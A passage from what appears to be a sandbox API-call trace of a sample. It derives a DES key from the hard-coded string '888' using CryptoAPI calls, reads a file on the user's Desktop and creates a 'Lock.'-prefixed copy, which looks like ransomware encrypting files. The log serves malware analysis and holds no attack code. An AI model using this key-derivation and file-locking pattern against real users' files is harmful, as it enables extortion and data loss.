lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.088] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0101.088] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.088] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0101.088] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.088] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.088] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.088] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.088] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.088] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.088] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.088] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.088] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.089] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0101.089] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.089] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0101.089] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.089] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.089] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.089] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.089] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.089] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.089] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.089] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.089] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.089] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0101.089] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.089] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0101.089] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.089] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.089] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9cb8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0101.089] CryptCreateHash (in: hProv=0x9bf440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0101.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.090] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.090] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.090] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0101.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0101.090] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0101.090] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0101.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0101.090] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.090] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.090] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.090] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.090] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.090] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.090] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9d78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0101.090] CryptHashData (hHash=0x9a3b80, pbData=0x2a71aa8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0101.090] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.128] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.128] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.128] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.128] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.128] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.128] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.128] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.128] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0101.128] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.128] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0101.128] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.128] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.128] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9e80, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0101.129] CryptDeriveKey (in: hProv=0x9bf440, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a47c0) returned 1 [0101.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.129] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.129] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0101.129] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.129] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0101.129] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0101.129] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7200, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0101.129] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0101.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.129] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.129] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.129] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.129] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.130] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/i6 iY_C6BkJ.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\i6 iy_c6bkj.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0101.130] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.130] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0101.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0101.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0101.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0101.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0101.131] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0101.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0101.131] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0101.131] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0101.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0101.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0101.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0101.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0101.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0101.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0101.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0101.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0101.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0101.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0101.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0101.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0101.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0101.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75ba0 [0101.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.131] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0101.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75ba0 | out: hHeap=0x2af0000) returned 1 [0101.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0101.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0101.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0101.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0101.132] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.i6 iY_C6BkJ.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.i6 iy_c6bkj.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0101.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70c0 [0101.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0101.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0101.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0101.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0101.132] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0101.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0101.132] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0101.132] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0101.133] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0101.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0101.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0101.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0101.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0101.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0101.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0101.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0101.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0101.133] HeapFree (in: 